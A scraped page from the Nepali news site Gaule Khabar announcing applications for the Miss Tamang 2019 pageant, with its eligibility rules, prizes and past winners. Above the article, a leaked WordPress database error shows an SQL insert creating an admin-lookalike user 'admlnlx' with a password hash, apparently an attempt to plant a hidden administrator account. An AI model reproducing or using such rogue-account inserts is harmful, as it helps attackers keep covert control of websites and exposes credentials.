WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bvs9GVa9c56yzEFZ.Tt0ixNZ.P3T3k/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 05:02:03', '', 'admlnlx', 'admlnlx')

मिस तामाङ – २०१९ का लागि आवेदन खुल्ला – Gaule Khabar

मिस तामाङ – २०१९ का लागि आवेदन खुल्ला

मिस तामाङ – २०१९ का लागि आवेदन खुल्ला

काठमाडौं । तामाङ सुन्दरी प्रतियोगिता (मिस तामाङ) ,२०१९ को लागि आवेदन खुल्ला गरिएको छ । काठमाडौको पुतलीसडकस्थित हलो क्याफेमा शुक्रबार पत्रकार सम्मेलन गरी मिस तामाङको आवेदन खुल्ला गरिएको हो।

एभरेष्ट फेसन होम नेपाल र नेपाल तामाङ कला संस्कृति केन्द्रले संयुक्तमा आयोजना गर्ने आयोजकका संयोजक रञ्जिता लामाले बताइन् । लामाका अनुसार सहभागिताको लागि आवश्यक मापदण्ड पूरा गर्नेले यही पौष १४ देखि माघ ५ सम्म आवेदन दिन सकिने र आर्थिक अवस्था कमजोर भएकोलाई विषेश छुट दिइनेछ ।

तामाङ जातिको भाषा, कला, संस्कृति, भेषभुषा, बाजा, रीतिरवाज र धर्मलार्ई युवा जमातमार्फत् सामाजिकीकरण गर्ने उद्देश्यले आयोजना हुँदै आएको सौन्दर्य प्रतियोगिताको यो १२ औं संस्करण हो। मिस तामाङ २०१९ को विजेताले नगद एक लाख रुपैयाँ र सिल्बर क्राउन पाउनेछन् ।त्यस्तै फस्ट रनर अपलाई ५० हजार र सिल्बर क्राउन, सेकेण्ड रनर अपलाई २५ हजार र सिल्बर क्राउन प्रदान गरिने छ भने अन्य १० प्रतिस्पर्धीलाई विभिन्न अवार्डहरू प्रदान गरिनेछ । आवेदन फार्म एभरेष्ट होमको कार्यालय पुतलीसडक काठमाडौमा पाइने जनाइएको छ ।

प्रतियोगितामा सहभागिता हुनको लागि तामाङ जातिको अविवाहित १६ देखि २८ बर्षसम्मको हुनुपर्ने, शैक्षिक योग्यताको हकमा एसईई उतीर्ण गरेको र कम्तिमा ५ फिट उचाई भएको हुनुपर्ने संयोजक लामाले बताइन् । लामाले थपिन् ‘संसारभरिकै देशहररूबाट सहभागी हुन सकिने छ र मिस तामाङ २०१९ को बिजेताले जर्जियामा हुने अन्तराष्ट्रिय सौन्दर्य प्रतियोगितामा भाग लिने अवसर पाउनेछिन्’। अहिलेसम्मको प्रतियोगितामा जेनिशा मोक्तान, उपली ग्याबक, समी बज्यु, रोजिना घिसिङ, सुमी मोक्तान, ल्हाक्पा तामाङ, मुनाश्री तामाङ, लक्ष्मी मोक्तान, उर्मिला योञ्जन, पिंकी घिसिङ र सिमरन स्याङ्बोले मिस तामाङको ताज पाहिरिसकेकी छन्।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका